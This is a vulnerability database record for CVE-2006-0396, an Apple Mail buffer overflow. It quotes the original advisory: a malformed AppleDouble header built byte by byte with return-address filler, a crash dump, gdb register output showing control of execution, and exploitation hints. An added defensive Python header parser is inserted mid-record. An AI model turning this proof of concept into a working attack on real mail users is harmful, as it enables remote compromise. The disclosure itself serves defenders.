var-200603-0281
Vulnerability from variot
Buffer overflow in Mail in Apple Mac OS X 10.4 up to 10.4.5, when patched with Security Update 2006-001, allows remote attackers to execute arbitrary code via a long Real Name value in an e-mail attachment sent in AppleDouble format, which triggers the overflow when the user double-clicks on an attachment. Mac OS X Mail is prone to a remote buffer-overflow vulnerability. This issue is due to a failure in the application to do proper bounds checking on user-supplied data before using it in a finite-sized buffer. A successful exploit may facilitate a compromise of the underlying computer.
This issue is present in Apple Mail when 'Security Update 2006-001' is applied. An attacker can trigger this vulnerability by sending a specially crafted MIME-encapsulated Macintosh file containing an AppleDouble header. Download Validation is used to warn the user if the file type is not "safe". Prior to 2006-001 certain techniques could be used to disguise a file's type so that the validation was bypassed. Unfortunately in the process of patching the previous problem a new one was introduced.
After applying Security Update 2006-001 Mail.app becomes vulnerable to a buffer overflow that may be triggered via a properly formatted MIME Encapsulated Macintosh file. Sending a file in the AppleDouble format with a long Real Name entry will invoke the overflow. Reading through RFC1740 should provide enough information to trigger the issue. The overflow is triggered by the file that contains the AppleDouble header information.
The format of the header we need to send is as follows:
[4 byte magic num][4 byte version num][16 bytes of filler][2 byte num of entries][Entry...]
Entry descriptor for each Entry:
[4 byte entry id][4 byte offset][4 byte length]
Using the above layout we come up with the following code snippet for our exploit.
"\x00\x05\x16\x07". # AppleDouble Magic Number
"\x00\x02\x00\x00". # Version 2
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". # 16 Bytes of filler
"\x00\x03\x00\x00". # Number of entries (3)
"\x00\x09\x00\x00". # Entry ID 9 is for 'Finder Info'
"\x00\x3e\x00\x00". # Start of Finder Info data is at file offset 0x3e
"\x00\x0a\x00\x00". # Length of Finder Info is 0x0a or 10
"\x00\x03\x00\x00". # Entry ID 3 is for 'Real Name'
"\x00\x48\x00\x00". # Start of Real Name data is at file offset 0x48
"\x00\xf5\x00\x00". # Length of Real Name is 0xf5 or 245
"\x00\x02\x00\x00". # Entry ID 2 is for 'Resource Fork'
"\x01\x3d\x00\x00". # Start of Resource Fork is at file offset 0x013d
"\x05\x3a\x00\x00". # Length of Resource fork is 0x053a
"\x00\x00\x00\x00". # <null> filler
"\x00\x00\x00\x00". # <null> filler
"A" x 226 . "$retaddr" x 3 . "zzz.mov." . # remember this length is hard coded above.
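The header layout above, read from the defender's side, as an added example (this is not code from the advisory, from Apple, or from the VARIoT record): a small Python parser for the RFC 1740 AppleDouble header that checks every entry descriptor against the size of the file and flags a Real Name entry that is over-long or not 7-bit printable ASCII, which is the check the vulnerable code path lacked. The 0x00051607 magic, the 26-byte header, the 12-byte entry descriptors and the entry IDs 2, 3 and 9 are from the page; MAX_REAL_NAME, build_appledouble and the sample blobs are constructed for illustration and are not an Apple limit or Apple data.

```python
"""Parse and sanity-check AppleDouble (RFC 1740) headers.

Added example for this page; not code from the advisory or from Apple.
Layout: [4 magic][4 version][16 filler][2 entry count][12-byte entry]*
Entry:  [4 entry id][4 offset][4 length]   (all big-endian)
"""
import struct

APPLEDOUBLE_MAGIC = 0x00051607
HEADER_LEN = 4 + 4 + 16 + 2          # magic, version, filler, entry count
ENTRY_LEN = 4 + 4 + 4                # id, offset, length
ENTRY_NAMES = {1: "Data Fork", 2: "Resource Fork", 3: "Real Name", 9: "Finder Info"}
MAX_REAL_NAME = 64                   # assumed gateway policy, not an Apple limit


def parse_appledouble(blob):
    """Return (entries, problems).

    entries is a list of (entry_id, offset, length) exactly as found in the
    header; problems lists every layout or policy violation, so a clean file
    yields an empty list. Nothing is copied before its range is validated.
    """
    problems = []
    if len(blob) < HEADER_LEN:
        return [], ["header truncated: %d bytes" % len(blob)]
    magic, version = struct.unpack(">II", blob[:8])
    (count,) = struct.unpack(">H", blob[24:26])
    if magic != APPLEDOUBLE_MAGIC:
        problems.append("bad magic 0x%08x" % magic)
    if version not in (0x00010000, 0x00020000):
        problems.append("unknown version 0x%08x" % version)
    # The entry table itself must fit; if not, only parse the entries present.
    table_end = HEADER_LEN + count * ENTRY_LEN
    if table_end > len(blob):
        problems.append("entry table runs past end of file")
        count = (len(blob) - HEADER_LEN) // ENTRY_LEN
        table_end = HEADER_LEN + count * ENTRY_LEN
    entries = []
    for i in range(count):
        off = HEADER_LEN + i * ENTRY_LEN
        eid, start, length = struct.unpack(">III", blob[off:off + ENTRY_LEN])
        entries.append((eid, start, length))
        name = ENTRY_NAMES.get(eid, "entry %d" % eid)
        # Every entry must lie entirely in the data area after the table.
        if start < table_end or start + length > len(blob):
            problems.append("%s: range [%d, %d) is outside the data area"
                            % (name, start, start + length))
            continue
        if eid == 3:  # Real Name: the field the advisory's overflow rides on
            real_name = blob[start:start + length]
            if length > MAX_REAL_NAME:
                problems.append("Real Name length %d exceeds limit %d"
                                % (length, MAX_REAL_NAME))
            if any(b < 0x20 or b > 0x7E for b in real_name):
                problems.append("Real Name contains non-printable or 8-bit bytes")
    return entries, problems


def check_attachment(blob):
    """Gateway-style verdict: True only when the header is well-formed and in policy."""
    _, problems = parse_appledouble(blob)
    return not problems


def build_appledouble(parts):
    """Lay out (entry_id, payload) pairs into a version-2 AppleDouble blob.

    Constructed helper used only to make test inputs for the parser.
    """
    header = struct.pack(">II16xH", APPLEDOUBLE_MAGIC, 0x00020000, len(parts))
    offset = HEADER_LEN + len(parts) * ENTRY_LEN
    table, body = b"", b""
    for eid, payload in parts:
        table += struct.pack(">III", eid, offset, len(payload))
        body += payload
        offset += len(payload)
    return header + table + body


# Constructed samples: a benign attachment header and two that should be flagged.
BENIGN = build_appledouble([(9, b"\x00" * 10), (3, b"report.txt")])
OVERSIZED = build_appledouble([(9, b"\x00" * 10), (3, b"A" * 245)])  # name length as in the advisory
TRUNCATED = BENIGN[:-4]  # Real Name descriptor now points past the end of the file

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN), ("oversized", OVERSIZED), ("truncated", TRUNCATED)):
        entries, problems = parse_appledouble(blob)
        print(label, entries, problems or "ok")
```

The parser deliberately trusts nothing in the entry table until the range has been compared with the real file size; a consumer that copies the Real Name into a fixed buffer must additionally clamp to that buffer's size, and the policy limit here stands in for that clamp on the receiving side.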
If a message with the above header arrived in your inbox on Mail.app you would see only the first 11 characters of the name provided by the Real Name entry. In this particular case you see "AAAAAAAAAAA...mov". Other examples could be "SuperTastey...mov" or "NakedChicks...mov". The visual aspects of the (...) are surprisingly not that suspicious.
Upon double clicking the attached file on the arrived email the following dump is created.
Date/Time: 2006-03-04 10:35:32.472 -0500
OS Version: 10.4.5 (Build 8H14)
Report Version: 4

Command: Mail
Path: /Applications/Mail.app/Contents/MacOS/Mail
Parent: WindowServer [64]

Version: 2.0.7 (746.2)
Build Version: 1
Project Name: MailViewer
Source Version: 7460200

PID: 271
Thread: 0

Exception: EXC_BAD_ACCESS (0x0001)
Codes: KERN_INVALID_ADDRESS (0x0001) at 0x41414140
If we take a look at this in gdb we can see that several things are overwritten.
(gdb) bt
#0 0x41424344 in ?? ()
Cannot access memory at address 0x41424344
Cannot access memory at address 0x31313131
Cannot access memory at address 0x41424344
Cannot access memory at address 0x41424344
#1 0x41424344 in ?? ()
Cannot access memory at address 0x41424344
Cannot access memory at address 0x41424344
Cannot access memory at address 0x31313131
warning: Previous frame identical to this frame (corrupt stack?)
Cannot access memory at address 0x41424344
Cannot access memory at address 0x41424344
Cannot access memory at address 0x31313139

We control r0, pc, lr and half of r31.
(gdb) i r $r0 $pc $lr $r31
r0 0x41424344 1094861636
pc 0x41424344 1094861636
lr 0x41424344 1094861636
r31 0x18b3030 25899056
Exploitation of this issue seems possible however there are currently some limitations with regard to what can and can not be done.
The first issue involves previous exploitation attempts and the temporary files left behind by such attempts.
k-fs-ibook:~ test$ ls -al /var/tmp/folders.502/TemporaryItems/ ~/Library/Mail\ Downloads/
/Users/test/Library/Mail Downloads/:
total 352
drwx------ 7 test admin 238 Mar 13 22:42 .
drwx------ 23 test admin 782 Mar 12 15:52 ..
drwx------ 3 test admin 102 Mar 13 22:42 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa0000
11112222ABCD3333zzz.mov.mailhold

/var/tmp/folders.502/TemporaryItems/:
total 352
drwxr-xr-x 4 test wheel 136 Mar 13 22:38 .
drwx------ 3 test wheel 102 Mar 12 10:35 ..
-rwxr-xr-x 1 test wheel 90000 Mar 13 22:44 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa00001
1112222ABCD3333zzz.mov.mov
The existence of a particular temporary file can halt the actions of an exploit attempting to take advantage of this issue. While developing an exploit keeping the two folders shown above clean is critical! The temporary files appear to be created during the process of previewing a message. In some cases they may not be created due to failed mkstemp() calls.
The next issue centers around the fact that RFC1740 states that the Real Name entry can only contain 7-bit printable ASCII; using shellcode addresses with 0xff and 0xbf will not be possible because of this. This obviously eliminates a lot of easy shellcode addresses unfortunately.
0xbfffe6e1: "Users/test/Library/Mail Downloads/", 'a' <repeats 166 times>...
0xbfffe7a9: 'a' <repeats 52 times>, "00\032\xff\xf8"
Code in other areas seems to be either in an unreliable location or in a unicode format. I am really not in the mood to hunt around memory for a stable address but I am sure that something could be put together to exploit this.
Here is an example of the Unicode strings that can be found in memory at random places.
(gdb) x/30a $r29
0x18b8a00: 0xa28e6424 0x12100000 0x2f0055 0x730065
0x18b8a10: 0x720073 0x2f0074 0x650073 0x74002f
0x18b8a20: 0x4c0069 0x620072 0x610072 0x79002f
0x18b8a30: 0x4d0061 0x69006c 0x200044 0x6f0077
0x18b8a40: 0x6e006c 0x6f0061 0x640073 0x2f0061
0x18b8a50: 0x610061 0x610061 0x610061 0x610061
0x18b8a60: 0x610061 0x610061 0x610061 0x610061
0x18b8a70: 0x610061 0x610061
On x86 the Unicode *may* not be a problem however I do not have access to an intel based mac so I can not confirm this. On PowerPC however for the time being there is not much I can do on the Unicode front. I am not aware of any Venetian style PowerPC lovin at the moment.
For the time being my exploitation has not gone beyond what I have documented here. Beyond the few hurdles I have outlined may lie a few more, but who knows? Good luck.
Work Around:
Install 2006-002 update or simply do not open attachments in Mail.app
http://www.apple.com/support/downloads/
Sidenote: Much thanks to Apple for the quick turnaround time and prompt weekend responses! A same day response and 9 day turn around is hard to beat
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200603-0281",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "mac os x",
"scope": "eq",
"trust": 1.6,
"vendor": "apple",
"version": "10.4.2"
},
{
"model": "mac os x server",
"scope": "eq",
"trust": 1.6,
"vendor": "apple",
"version": "10.4"
},
{
"model": "mac os x server",
"scope": "eq",
"trust": 1.6,
"vendor": "apple",
"version": "10.4.3"
},
{
"model": "mac os x",
"scope": "eq",
"trust": 1.6,
"vendor": "apple",
"version": "10.4.4"
},
{
"model": "mac os x server",
"scope": "eq",
"trust": 1.6,
"vendor": "apple",
"version": "10.4.2"
},
{
"model": "mac os x server",
"scope": "eq",
"trust": 1.6,
"vendor": "apple",
"version": "10.4.5"
},
{
"model": "mac os x",
"scope": "eq",
"trust": 1.6,
"vendor": "apple",
"version": "10.4.1"
},
{
"model": "mac os x server",
"scope": "eq",
"trust": 1.6,
"vendor": "apple",
"version": "10.4.1"
},
{
"model": "mac os x server",
"scope": "eq",
"trust": 1.6,
"vendor": "apple",
"version": "10.4.4"
},
{
"model": "mac os x",
"scope": "eq",
"trust": 1.6,
"vendor": "apple",
"version": "10.4.3"
},
{
"model": "mac os x",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "10.4.5"
},
{
"model": "mac os x",
"scope": "eq",
"trust": 1.0,
"vendor": "apple",
"version": "10.4"
},
{
"model": null,
"scope": null,
"trust": 0.8,
"vendor": "apple computer",
"version": null
},
{
"model": "mac os x",
"scope": "eq",
"trust": 0.8,
"vendor": "apple",
"version": "10.4 to 10.4.5"
},
{
"model": "mac os x server",
"scope": "eq",
"trust": 0.8,
"vendor": "apple",
"version": "10.4 to 10.4.5"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.5"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.4"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.3"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.2"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.1"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.5"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.4"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.3"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.2"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4.1"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.4"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#980084"
},
{
"db": "BID",
"id": "17081"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-003846"
},
{
"db": "CNNVD",
"id": "CNNVD-200603-268"
},
{
"db": "NVD",
"id": "CVE-2006-0396"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:apple:mac_os_x",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:apple:mac_os_x_server",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2006-003846"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Kevin Finisterre dotslash@snosoft.com",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200603-268"
}
],
"trust": 0.6
},
"cve": "CVE-2006-0396",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "HIGH",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 5.1,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 4.9,
"id": "CVE-2006-0396",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.9,
"vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "HIGH",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 5.1,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 4.9,
"id": "VHN-16504",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:H/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2006-0396",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#980084",
"trust": 0.8,
"value": "6.63"
},
{
"author": "NVD",
"id": "CVE-2006-0396",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-200603-268",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-16504",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2006-0396",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#980084"
},
{
"db": "VULHUB",
"id": "VHN-16504"
},
{
"db": "VULMON",
"id": "CVE-2006-0396"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-003846"
},
{
"db": "CNNVD",
"id": "CNNVD-200603-268"
},
{
"db": "NVD",
"id": "CVE-2006-0396"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Buffer overflow in Mail in Apple Mac OS X 10.4 up to 10.4.5, when patched with Security Update 2006-001, allows remote attackers to execute arbitrary code via a long Real Name value in an e-mail attachment sent in AppleDouble format, which triggers the overflow when the user double-clicks on an attachment. Mac OS X Mail is prone to a remote buffer-overflow vulnerability. This issue is due to a failure in the application to do proper bounds checking on user-supplied data before using it in a finite-sized buffer. A successful exploit may facilitate a compromise of the underlying computer. \nThis issue is present in Apple Mail when \u0027Security Update 2006-001\u0027 is applied. An attacker can trigger this vulnerability by sending a specially crafted MIME-encapsulated Macintosh file containing an AppleDouble header. Download Validation is used to warn the user if the file type is not \"safe\". Prior \nto 2006-001 certain techniques could be used to disguise a file\u0027s type so that the validation \nwas bypassed. Unfortunately in the process of patching the previous problem a new one was \nintroduced. \n\nAfter applying Security Update 2006-001 Mail.app becomes vulnerable to a buffer overflow that\nmay be triggered via a properly formatted MIME Encapsuled Macintosh file. Sending a file in \nthe AppleDouble format with a long Real Name entry will invoke the overflow. Reading through \nRFC1740 should provide enough information to trigger the issue. The overflow is triggered \nby the file that contains the AppleDouble header information. \n\nThe format of the header we need to send is as follows: \n\n[4 byte magic num][4 byte version num][16 bytes of filler][2 byte num of entries][Entry...]\nEntry descriptor for each Entry:\n[4 byte entry id][4 byte offset][4 byte length]\n\nUsing the above layout we come up with the following code snippet for our exploit. \n\n\"\\x00\\x05\\x16\\x07\". # AppleDouble Magic Number\n\"\\x00\\x02\\x00\\x00\". # Version 2\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\". \t# 16 Bytes of filler\n\"\\x00\\x03\\x00\\x00\". # Number of entries (3)\n\"\\x00\\x09\\x00\\x00\". # Entry ID 9 is for \u0027Finder Info\u0027\n\"\\x00\\x3e\\x00\\x00\". # Start of Finder Info data is at file offset 0x3e\n\"\\x00\\x0a\\x00\\x00\". # Length of Finder Info is 0x0a or 10\n\"\\x00\\x03\\x00\\x00\". # Entry ID 3 is for \u0027Real Name\u0027\n\"\\x00\\x48\\x00\\x00\". # Start of Real Name data is at file offset 0x48\n\"\\x00\\xf5\\x00\\x00\". # Length of Real Name is 0xf5 or 245\n\"\\x00\\x02\\x00\\x00\". # Entry ID 2 is for \u0027Resource Fork\u0027\n\"\\x01\\x3d\\x00\\x00\". # Start of Resource Fork is at file offset 0x013d\n\"\\x05\\x3a\\x00\\x00\". # Length of Resource fork is 0x053a\n\"\\x00\\x00\\x00\\x00\". # \u003cnull\u003e filler\n\"\\x00\\x00\\x00\\x00\". # \u003cnull\u003e filler\n\"A\" x 226 . \"$retaddr\" x 3 . \"zzz.mov.\" . # remember this length is hard coded above. \n\nIf a message with the above header arrived in your inbox on Mail.app you would see only the\nfirst 11 characters of the name provided by the Real Name entry. In this particular case you \nsee \"AAAAAAAAAAA...mov\" . Other examples could be \"SuperTastey...mov\" or NakedChicks...mov\" . \nThe visual aspects of the (...) are surprisingly not that suspicious. \n\nUpon double clicking the attached file on the arrived email the following dump is created. \n\nDate/Time: 2006-03-04 10:35:32.472 -0500\nOS Version: 10.4.5 (Build 8H14)\nReport Version: 4\n\nCommand: Mail\nPath: /Applications/Mail.app/Contents/MacOS/Mail\nParent: WindowServer [64]\n\nVersion: 2.0.7 (746.2)\nBuild Version: 1\nProject Name: MailViewer\nSource Version: 7460200\n\nPID: 271\nThread: 0\n\nException: EXC_BAD_ACCESS (0x0001)\nCodes: KERN_INVALID_ADDRESS (0x0001) at 0x41414140\n\nIf we take a look at this in gdb we can see that several things are overwirtten. \n(gdb) bt\n#0 0x41424344 in ?? ()\nCannot access memory at address 0x41424344\nCannot access memory at address 0x31313131\nCannot access memory at address 0x41424344\nCannot access memory at address 0x41424344\n#1 0x41424344 in ?? ()\nCannot access memory at address 0x41424344\nCannot access memory at address 0x41424344\nCannot access memory at address 0x31313131\nwarning: Previous frame identical to this frame (corrupt stack?)\nCannot access memory at address 0x41424344\nCannot access memory at address 0x41424344\nCannot access memory at address 0x31313139\n\nWe control r0, pc, lr and half of r31. \n(gdb) i r $r0 $pc $lr $r31\nr0 0x41424344 1094861636\npc 0x41424344 1094861636\nlr 0x41424344 1094861636\nr31 0x18b3030 25899056\n\nExploitation of this issue seems possible however there are currently some limitations \nwith regard to what can and can not be done. \n\nThe first issue involves previous exploitation attempts and the temporary files left \nbehind by such attempts. \n\nk-fs-ibook:~ test$ ls -al /var/tmp/folders.502/TemporaryItems/ ~/Library/Mail\\ Downloads/\n/Users/test/Library/Mail Downloads/:\ntotal 352\ndrwx------ 7 test admin 238 Mar 13 22:42 . \ndrwx------ 23 test admin 782 Mar 12 15:52 .. \ndrwx------ 3 test admin 102 Mar 13 22:42 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa0000\n11112222ABCD3333zzz.mov.mailhold\n\n/var/tmp/folders.502/TemporaryItems/:\ntotal 352\ndrwxr-xr-x 4 test wheel 136 Mar 13 22:38 . \ndrwx------ 3 test wheel 102 Mar 12 10:35 .. \n-rwxr-xr-x 1 test wheel 90000 Mar 13 22:44 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa00001\n1112222ABCD3333zzz.mov.mov\n\nThe existance of a particular temporary file can halt the actions of an exploit attempting \nto take advantage of this issue. While developing an exploit keeping the two folders shown \nabove clean is critical! The temporary files appear to be created during the process of \npreviewing a message. In some cases they may not be created due to failed mkstemp() calls. \n\nThe next issue centers around the fact that RFC1740 states that the Real Name entry can \nonly contain 7bit printable ascii, using shellcode addresses with 0xff and 0xbf will not\nbe possible because of this. This obviously eliminates alot of easy shellcode addresses \nunfortunately. \n\n0xbfffe6e1: \"Users/test/Library/Mail Downloads/\", \u0027a\u0027 \u003crepeats 166 times\u003e... \n0xbfffe7a9: \u0027a\u0027 \u003crepeats 52 times\u003e, \"00\\032\\xff\\xf8\"\n\nCode in other areas seems to be either in an unreliable location or in a unicode format. \nI am really not in the mood to hunt around memory for a stable address but I am sure that\nsomething could be put together to exploit this. \n\nHere is an example of the Unicode strings that can be found in memory at random places. \n(gdb) x/30a $r29\n0x18b8a00: 0xa28e6424 0x12100000 0x2f0055 0x730065\n0x18b8a10: 0x720073 0x2f0074 0x650073 0x74002f\n0x18b8a20: 0x4c0069 0x620072 0x610072 0x79002f\n0x18b8a30: 0x4d0061 0x69006c 0x200044 0x6f0077\n0x18b8a40: 0x6e006c 0x6f0061 0x640073 0x2f0061\n0x18b8a50: 0x610061 0x610061 0x610061 0x610061\n0x18b8a60: 0x610061 0x610061 0x610061 0x610061\n0x18b8a70: 0x610061 0x610061\n\nOn x86 the Unicode *may* not be a problem however I do not have access to an intel based\nmac so I can not confirm this. On PowerPC however for the time being there is not much \nI can do on the Unicode front. I am not aware of any Venetian style PowerPC lovin at the \nmoment. \n\nFor the time being my exploitation has not gone beyond what I have documented here. Beyond \nthe few hurdles I have outlined may lie a few more, but who knows? Good luck. \n\nWork Around: \nInstall 2006-002 update or simply do not open attachments in Mail.app \nhttp://www.apple.com/support/downloads/\n\nSidenote:\nMuch thanks to Apple for the quick turnaround time and prompt weekend responses! A same\nday response and 9 day turn around is hard to beat",
"sources": [
{
"db": "NVD",
"id": "CVE-2006-0396"
},
{
"db": "CERT/CC",
"id": "VU#980084"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-003846"
},
{
"db": "BID",
"id": "17081"
},
{
"db": "VULHUB",
"id": "VHN-16504"
},
{
"db": "VULMON",
"id": "CVE-2006-0396"
},
{
"db": "PACKETSTORM",
"id": "44647"
}
],
"trust": 2.88
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-16504",
"trust": 0.1,
"type": "unknown"
},
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=1583",
"trust": 0.1,
"type": "exploit"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-16504"
},
{
"db": "VULMON",
"id": "CVE-2006-0396"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#980084",
"trust": 3.4
},
{
"db": "NVD",
"id": "CVE-2006-0396",
"trust": 3.0
},
{
"db": "SECUNIA",
"id": "19129",
"trust": 2.6
},
{
"db": "BID",
"id": "17081",
"trust": 2.1
},
{
"db": "SECTRACK",
"id": "1015762",
"trust": 1.8
},
{
"db": "VUPEN",
"id": "ADV-2006-0949",
"trust": 1.8
},
{
"db": "OSVDB",
"id": "23872",
"trust": 1.8
},
{
"db": "JVNDB",
"id": "JVNDB-2006-003846",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200603-268",
"trust": 0.7
},
{
"db": "BUGTRAQ",
"id": "20060314 DMA[2006-0313A] - \u0027APPLE OSX MAIL.APP RFC1740 REAL NAME BUFFER OVERFLOW\u0027",
"trust": 0.6
},
{
"db": "APPLE",
